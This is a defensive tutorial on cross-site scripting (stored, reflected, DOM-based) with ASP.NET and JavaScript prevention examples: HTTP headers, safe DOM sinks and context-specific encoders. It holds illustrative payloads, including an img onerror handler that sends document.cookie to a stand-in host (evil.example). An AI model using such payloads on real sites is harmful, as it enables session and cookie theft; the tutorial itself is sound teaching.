What is Cross Site Scripting (XSS)
Cross Site Scripting (XSS) is a vulnerability that allows an attacker to inject client-side scripts (usually JavaScript) into web pages viewed by other users.
When a victim loads an affected page, the attacker's script runs in their browser with the privileges of the site, so it can steal session tokens and cookies, change the content of the page through DOM manipulation, or redirect the browser. XSS vulnerabilities typically occur when an application takes user input and writes it into a page without validating or encoding it.
Types of Cross Site Scripting (XSS) attacks
Persistent (stored) XSS attack
In this type of attack, the malicious script is stored on the target server (for example in a database) and served to every user who later views the affected content, which is why it is known as a Persistent or Stored Cross Site Scripting attack. The attacker injects the script through any input the application saves and later displays, for example:
- Forum posts or comments
- A username or other login-form field whose value is shown to other users
- Any other entry stored in a database
With this type of attack, everyone who views the infected post, message or other element becomes a victim, without having to click a crafted link.
Reflected XSS attack
In this second type (sometimes called a mirrored or non-persistent attack), the attacker injects the script into a request to the vulnerable site, which reflects it straight back in its response to the user. The most common targets are pages where the user's input becomes part of the page's output.
A search page that echoes the search terms back to the user is a typical entry point. The injected script is never stored by the web application; the victim has to be tricked into opening a crafted URL or submitting a crafted form.
DOM-based attacks
This third kind of Cross Site Scripting attack happens entirely in the browser. It works by manipulating the browser's internal model of the web page, the DOM, which is why it is known as a DOM-based attack.
Like the previous two, this allows the attacker to execute malicious code. The difference is that the response from the server may be perfectly clean: the page's own JavaScript reads attacker-controlled data from a source such as location.hash or the query string and writes it into a dangerous sink such as innerHTML or eval, where the browser interprets it as markup or script.
How to prevent Cross-Site Scripting (XSS)
To prevent Cross Site Scripting (XSS) attacks, the first rule is not to trust any input, whether it comes from the user or from any other external source.
The web application must treat this data as potentially dangerous regardless of its origin. Below are three specific measures, illustrated with ASP.NET, that help prevent these attacks in a simple way:
Use proper HTTP headers
HTTP headers are part of every request and response. They can instruct the browser to treat the data in a certain way and include directives that help increase the security of the website.
The X-XSS-Protection header instructs the browser to enable its built-in cross-site scripting filter, which can block certain reflected attacks. Its values are:
X-XSS-Protection: 1
or
X-XSS-Protection: 1; mode=block
With a value of 1, the browser sanitizes the page (strips the suspicious part) if a reflected cross-site scripting attack is detected. Adding mode=block makes the browser stop rendering the page entirely when an attack is detected.
Caveat: this header is deprecated. Chrome and Edge have removed their XSS filter, Firefox never implemented one, and the filter itself had security problems of its own, so OWASP's HTTP headers guidance now recommends sending X-XSS-Protection: 0 and relying on a Content-Security-Policy (CSP) that forbids inline scripts. Setting the header still does no harm on old browsers, but it must never be the only defence.
To add this HTTP header to your ASP.NET application, add the following to the web.config file, inside <system.webServer> (element names are case sensitive):
<httpProtocol>
  <customHeaders>
    <add name="X-XSS-Protection" value="1; mode=block" />
  </customHeaders>
</httpProtocol>
Securely insert data into HTML code
To avoid the DOM-based XSS described above, the page's own scripts must use the HTML DOM safely. There are several methods available for dynamically inserting content into HTML markup, and some of them are far more prone to cross-site scripting than others.
For example, when we want to add text to an HTML element, we must use a method that interprets the data only as text and never as HTML code.
This property interprets all input as plain text:
document.getElementById("id").textContent = "user data";
While this one parses the string as HTML, so any tags and event handlers in it become live markup:
document.getElementById("id").innerHTML = "user data";
That makes innerHTML (and relatives such as outerHTML, document.write and insertAdjacentHTML) a sink for Cross Site Scripting (XSS) attacks whenever the string contains untrusted data.
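The following is an added example, not code from the original post, showing the whole DOM-based path from source to sink: the search term is taken from the query string and written into the page either with textContent (safe) or innerHTML (vulnerable), plus the related href sink, where the fix is scheme validation rather than encoding. The render functions take any object with the element properties they touch, so they can be exercised in Node without a browser; shop.example and evil.example are assumed hosts and the payload is constructed for illustration.

```javascript
// Added example, not from the original post: the DOM-based XSS pattern,
// source (query string) to sink (innerHTML vs textContent, and href).
// shop.example / evil.example are assumed hosts; PAYLOAD is constructed.

// Source: the search term exactly as it arrives in the URL, attacker-controlled.
function extractTerm(pageUrl) {
  return new URL(pageUrl).searchParams.get('q') || '';
}

// Constructed attacker input: no <script> tag needed, an event handler will do.
const PAYLOAD =
  '<img src=x onerror="fetch(\'https://evil.example/?c=\' + document.cookie)">';

// SAFE sink: textContent stores the string as a text node; the browser shows
// the literal characters "<img ..." and never parses them as markup.
function renderAsText(el, term) {
  el.textContent = 'Results for: ' + term;
  return el.textContent;
}

// VULNERABLE sink, kept only to show the contrast: innerHTML parses the string
// as HTML, so the onerror handler above becomes live and fires immediately.
function renderAsHtml(el, term) {
  el.innerHTML = 'Results for: ' + term; // DO NOT do this with untrusted data
  return el.innerHTML;
}

// A second common sink: href. Encoding does not stop a javascript: URL, so
// validate the scheme instead. Returns the absolute URL or null if rejected.
function safeHref(candidate, base = 'https://shop.example/') {
  let url;
  try {
    url = new URL(candidate, base);
  } catch (e) {
    return null; // not parseable as a URL at all
  }
  return url.protocol === 'http:' || url.protocol === 'https:' ? url.href : null;
}

// In a browser the page's own script would look like this:
//   const term = extractTerm(location.href);
//   renderAsText(document.getElementById('results'), term);
//   link.href = safeHref(term) || '#';
```

Note that the server never saw the payload as markup: it was URL-encoded in the query string and only became dangerous when the client-side script handed it to innerHTML. That is why server-side filtering alone does not catch DOM-based XSS.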
Use the AntiXSS library
This library offers encoding methods for preventing Cross Site Scripting (XSS) attacks (in .NET Framework 4.5 and later the same encoders ship as System.Web.Security.AntiXss.AntiXssEncoder). The important point is to choose the encoding method based on where the untrusted data is going to be placed and how it gets there. For example:
Before inserting untrusted data into an HTML attribute, use the AntiXSS.HtmlAttributeEncode method, which is specifically designed to stop an attacker from breaking out of the attribute.
Use AntiXSS.HtmlEncode before placing untrusted data inside the content of an HTML element.
Using the wrong encoder for the context (for example the element-content encoder inside an unquoted attribute) leaves the page exploitable even though the data was "encoded".
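To make the "right encoder for the right context" rule concrete, here is an added example in JavaScript (not the AntiXSS library's code, and not from the original post) with two encoders modelled on what HtmlEncode and HtmlAttributeEncode do, and a demonstration of a payload that survives the content encoder but not the attribute encoder. The allow-list approach for attributes (encode everything except letters and digits) follows the principle the AntiXSS library documents; the function names and sample inputs are our own.

```javascript
// Added example, not from the original post or the AntiXSS library: two
// context-specific encoders in the spirit of HtmlEncode / HtmlAttributeEncode.
// Function names and the constructed payloads are our own.

// For text between tags: the five characters that can start markup or close
// an attribute are replaced with entities. Everything else is safe in content.
function encodeForHtmlContent(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// For attribute values: allow-list. Only ASCII letters and digits pass
// through; every other code point becomes a numeric entity, so an attacker
// can neither close the quote nor, in an unquoted attribute, break out with a
// space, '=' or '/'.
function encodeForHtmlAttribute(s) {
  let out = '';
  for (const ch of String(s)) {
    const cp = ch.codePointAt(0);
    out += /[A-Za-z0-9]/.test(ch) ? ch : `&#x${cp.toString(16).toUpperCase()};`;
  }
  return out;
}

// Search page that puts the same untrusted term into both contexts,
// each with its own encoder.
function renderSearchPage(term) {
  return [
    `<input type="text" name="q" value="${encodeForHtmlAttribute(term)}">`,
    `<p>Results for: ${encodeForHtmlContent(term)}</p>`,
  ].join('\n');
}

// The mistake the text warns about: the content encoder used inside an
// UNQUOTED attribute. A payload with no & < > " ' characters passes through
// untouched, and the space lets it add an event handler.
function renderTitleWrongly(term) {
  return `<div title=${encodeForHtmlContent(term)}>item</div>`;
}

// Constructed attacker inputs, one per context.
const CONTENT_PAYLOAD = '<script>alert("x")</script>';
const ATTRIBUTE_PAYLOAD = 'x onmouseover=alert(1)';
```

Always quote attributes as well; the allow-list encoder protects unquoted ones, but quoting costs nothing and removes a whole class of parser edge cases. Other contexts (URLs, JavaScript strings, CSS) need their own encoders again; neither of the two above is correct there.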
Conclusion
Preventing Cross Site Scripting (XSS) is not easy: OWASP lists more than 80 attack vectors that can be used for Cross Site Scripting, so no single filter catches them all. Treat every input as untrusted, encode output for the exact context it lands in, avoid dangerous DOM sinks, and back it all with a Content-Security-Policy.
Top comments (2)
[[..PingBack...]]
This article was curated as a part of 44th Issue of software Testing Notes.
Perfect! Thanks!